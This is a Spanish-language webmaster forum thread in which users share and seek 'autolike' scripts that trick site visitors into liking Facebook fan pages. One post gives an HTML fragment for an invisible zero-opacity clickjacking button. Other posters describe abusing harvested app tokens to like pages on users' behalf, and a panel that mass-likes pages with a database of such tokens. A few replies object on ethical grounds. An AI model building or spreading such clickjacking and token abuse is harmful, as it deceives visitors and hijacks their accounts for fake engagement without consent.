Autolike – sin clic te haces fans! Lo conocen?

Estado
No está abierto para más respuestas.
Mensajes
419
Puntuación de reacción
0
Que haces Ema, yo tengo este, a mi me funciona, no se si es lo que buscas. En el header pones, justo despues de <body>:



y en footer.php, justo antes del </body>




No se si es el mismo que el que publicó el otro usuario, pero este me da fans sin que hagan click en ningun lado...
Solo tendrías que cambiar http://www.facebook.com/lavidabella2 por tu link
En caso de que sea clickjacking... funciona bastante bien para mi :D

Por cierto, si te funciona, deja mi enlace un par de días, como un favor nomas ;)

Lo estoy probando pero no me funciona, la carita del codigo lo he remplazado por ": D" sin espacio, pero nada!

Que proda ser? En que sitio lo usas?

Muchas gracias!!!!!!
 
Mensajes
200
Puntuación de reacción
0
HTML:
<!-- inicio autolike -->
<div id="clickjack-button-wrapper-6" style="position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)'; margin-left: -50px; z-index: 100; width:1px; height:1px; overflow:hidden"></div>

Cuando publiquen código usen la etiqueta correspondiente para evitar los emoticones, y hacer más facil su lectura y manejo.
 
Última edición:

Sebas

Piedra
Usuario de Piedra
Mensajes
51
Puntuación de reacción
0
Lo estoy probando pero no me funciona, la carita del codigo lo he remplazado por ": D" sin espacio, pero nada!

Que proda ser? En que sitio lo usas?

Muchas gracias!!!!!!


Si, es dos puntos y d mayúsculas.
Mirá, lo estoy usando en 1000 Imagenes de amor
es un sitio que tiene apenas 50 visitas diarias en promedio... y segun las estadisticas, desde los primeros dias de abril tengo casi 700 me gusta nuevos, y solo vienen de ahi por que esta fanpage (lavidaesbella) era nueva, apenas pisaba los 100 fans cuando la puse en el sitio y nunca le hice publicidad ni nada
 
Mensajes
419
Puntuación de reacción
0
Si, es dos puntos y d mayúsculas.
Mirá, lo estoy usando en 1000 Imagenes de amor
es un sitio que tiene apenas 50 visitas diarias en promedio... y segun las estadisticas, desde los primeros dias de abril tengo casi 700 me gusta nuevos, y solo vienen de ahi por que esta fanpage (lavidaesbella) era nueva, apenas pisaba los 100 fans cuando la puse en el sitio y nunca le hice publicidad ni nada

Bien, pero he probado tu pagina y no es el script que digo, es el autolike que tienes que hacer clic en alguna parte de la pagina!

gracias de todos modos!
 

pingu

Piedra
Usuario de Piedra
Mensajes
47
Puntuación de reacción
0
sín ánimo de hacer muchi offtopic... creo que cualquier modo de engaño al visitante no le gusta adsense diría yo...
 
Mensajes
80
Puntuación de reacción
0
Si, es dos puntos y d mayúsculas.
Mirá, lo estoy usando en 1000 Imagenes de amor
es un sitio que tiene apenas 50 visitas diarias en promedio... y segun las estadisticas, desde los primeros dias de abril tengo casi 700 me gusta nuevos, y solo vienen de ahi por que esta fanpage (lavidaesbella) era nueva, apenas pisaba los 100 fans cuando la puse en el sitio y nunca le hice publicidad ni nada

No funciona el script en tu sitio.. lo he probado y nada..
 

maneccp

Piedra
Usuario de Piedra
Mensajes
35
Puntuación de reacción
0
Ético no es, pero que cada uno haga lo que quiera
 

thebiigbos

Piedra
Usuario de Piedra
Mensajes
47
Puntuación de reacción
0
gracias amigos voy a usarlo aver muchas gracias , porque yo tengo uno y cuando lo pongo mi salta el antivirus en mi web o blog
 

ups_5

Piedra
Usuario de Piedra
Mensajes
53
Puntuación de reacción
0
Ya estaba publicado en este foro, pero para hacer likes en páginas. Lo tengo también publicado en mi blog, te hago un copy paste para no spamear:



--EDITADO--
Este blog abrevia enlaces por los títulos, en algunos casos pone "Facebook". Si te lias aquí tienes la entrada en mi blog: Script autolike para Facebook | SEODani
Hace unos días buscaba algo así, gracias a vosotros ya lo tengo. Gracias.
 

Julio Rodríguez

Diamante
Usuario de Bronce
Mensajes
2,521
Puntuación de reacción
2
@seo365 si, pero tienen que aceptar una aplicación una vez mínimo y luego con el token juegan
 

Julio Rodríguez

Diamante
Usuario de Bronce
Mensajes
2,521
Puntuación de reacción
2
con un solo click????

aceptas la aplicación y el usuario tiene un token, ese token funciona durante 5 minutos, pero puedes actualizarlo cada vez qel usuario visite tu web, por lo que siempre podras dar like a fanpages si el usuario visito tu web hace menos de 5 minutoss
 
Mensajes
372
Puntuación de reacción
0
te envie un mp
aceptas la aplicación y el usuario tiene un token, ese token funciona durante 5 minutos, pero puedes actualizarlo cada vez qel usuario visite tu web, por lo que siempre podras dar like a fanpages si el usuario visito tu web hace menos de 5 minutoss
 
Mensajes
103
Puntuación de reacción
0
@seo365, yo tengo uno que tiene panel, puedes filtrar por edad, sexo, ubicacion, intereses, solo pones las fanpages.

El tema es este... si tienes 1000 usuarios en la db, puedes crear cuantas fanpages de 1000 quieras estando ellos conectados o no. Es algo lento.
 

luismy0087

Piedra
Usuario de Piedra
Mensajes
66
Puntuación de reacción
0
Y una pregunta.. ¿Eso no puede ser peligroso paras las fanpages a las que se hacen fans? Yo no me fiaría de eso, ¿Que opináis?
 
Estado
No está abierto para más respuestas.
Arriba